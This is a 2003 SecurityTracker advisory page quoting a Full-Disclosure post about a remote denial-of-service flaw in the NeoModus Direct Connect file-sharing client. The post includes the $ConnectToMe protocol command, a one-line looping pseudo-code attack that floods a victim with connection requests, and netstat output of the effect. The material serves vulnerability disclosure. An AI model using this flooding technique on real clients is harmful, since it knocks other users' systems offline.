Home    |    View Topics    |    Search    |    Contact Us    |   



Category:   Application (File Transfer/Sharing)  >   Direct Connect Vendors:   NeoModus
NeoModus Direct Connect Permits Remote Denial of Service Attacks
SecurityTracker Alert ID:  1007186
SecurityTracker URL:
CVE Reference:   GENERIC-MAP-NOMATCH   (Links to External Site)
Date:  Jul 14 2003
Impact:   Denial of service via network

Version(s): 1.0 build 9 tested; possibly the 1.0 build 9.1 version
Description:   A resource consumption vulnerability was reported in the NeoModus Direct Connect file sharing application. A remote user can cause denial of service conditions on the target system.

sec-labs team reported that a remote user can cause a connected target user's system to open a large number of connections to a specified port on a specified host with a command of the following format:

$ConnectToMe <U's username> <D's IP and port>|

This will reportedly cause denial of service conditions on the target user's system.

Only the Windows version was tested.

Impact:   A remote user can cause a large number of connections to be opened by the target user's system, resulting in resource starvation and denial of service conditions.
Solution:   No solution was available at the time of this entry.
Vendor URL: (Links to External Site)
Cause:   Resource error, State error
Underlying OS:  Windows (Any)
Underlying OS Comments:  Only the Windows version was tested

Message History:   None.

 Source Message Contents

Subject:  [Full-Disclosure] [sec-labs] Remote Denial of Service vulnerability in NeoModus

Content-Type: text/plain; charset=US-ASCII
Content-Transfer-Encoding: 7bit

     sec-labs team proudly presents:
     Remote DoS vulnerability in NeoModus Direct Connect 1.0 build 9
     and probably newest version.	  
     by Lord YuP


     Direct Connect is a windows (i've found also a linux version but
     i don't have time to test it) p2p file-sharing program, well 
     common nowadays.


     Appending to aDe DC Client to Client HandShake looks like:

     	Client <-> Client Communication in DC. 11-05-2002. By aDe 

	D = downloader 
	U = uploader 
	H = hub 

	D>H: $ConnectToMe <U's username> <D's IP and port>|
	H>U: $ConnectToMe <U's username> <D's IP and port>|

	...bla bla ... ;)

     As u can guess, the Direct Connect client after receiving
     "$Connect ToMe..." command from hub, tries to connect to 
     specyfic IP and PORT sent by the Downloader.

     The attacker (evil-downloader) can send infinite requests
     to HUB with specyfic marked ip:port causing DoS attack 
     in the Victim's client. 

     Little example:
     Attacker: for (;;) { dc_send("$ConnectToMe victim",sample_port++); }

     Client: (runned "netstat -a")

	  TCP    jin:1993               JIN:0                  LISTENING
	  TCP    jin:1995               JIN:0                  LISTENING
	  TCP    jin:1996               JIN:0                  LISTENING
	  TCP    jin:2005               JIN:0                  LISTENING
	  TCP    jin:2006               JIN:0                  LISTENING
	  TCP    jin:2007               JIN:0                  LISTENING
	  TCP    jin:2008               JIN:0                  LISTENING
	  TCP    jin:2009               JIN:0                  LISTENING
	  TCP    jin:2010               JIN:0                  LISTENING
	  TCP    jin:2011               JIN:0                  LISTENING
	  TCP    jin:2012               JIN:0                  LISTENING
	  TCP    jin:2013               JIN:0                  LISTENING
	  TCP    jin:2014               JIN:0                  LISTENING
	  TCP    jin:2015               JIN:0                  LISTENING
	  TCP    jin:2016               JIN:0                  LISTENING
	  TCP    jin:2017               JIN:0                  LISTENING
	  TCP    jin:2018               JIN:0                  LISTENING
	  TCP    jin:2019               JIN:0                  LISTENING
	  ...and so on...


     The attacked client may be DoS-ed in case of that internet connection
     can be reseted/stopped, some clients may flood with the "Out of Memory"
     msgboxes in case of that, system may be not working correctly, and DC
     client may be terminated.

sec-labs team []

Content-Type: application/pgp-signature

Version: GnuPG v1.2.0 (GNU/Linux)


Full-Disclosure - We believe in it.


Go to the Top of This SecurityTracker Archive Page

Home   |    View Topics   |    Search   |    Contact Us

This web site uses cookies for web analytics. Learn More

Copyright 2021, LLC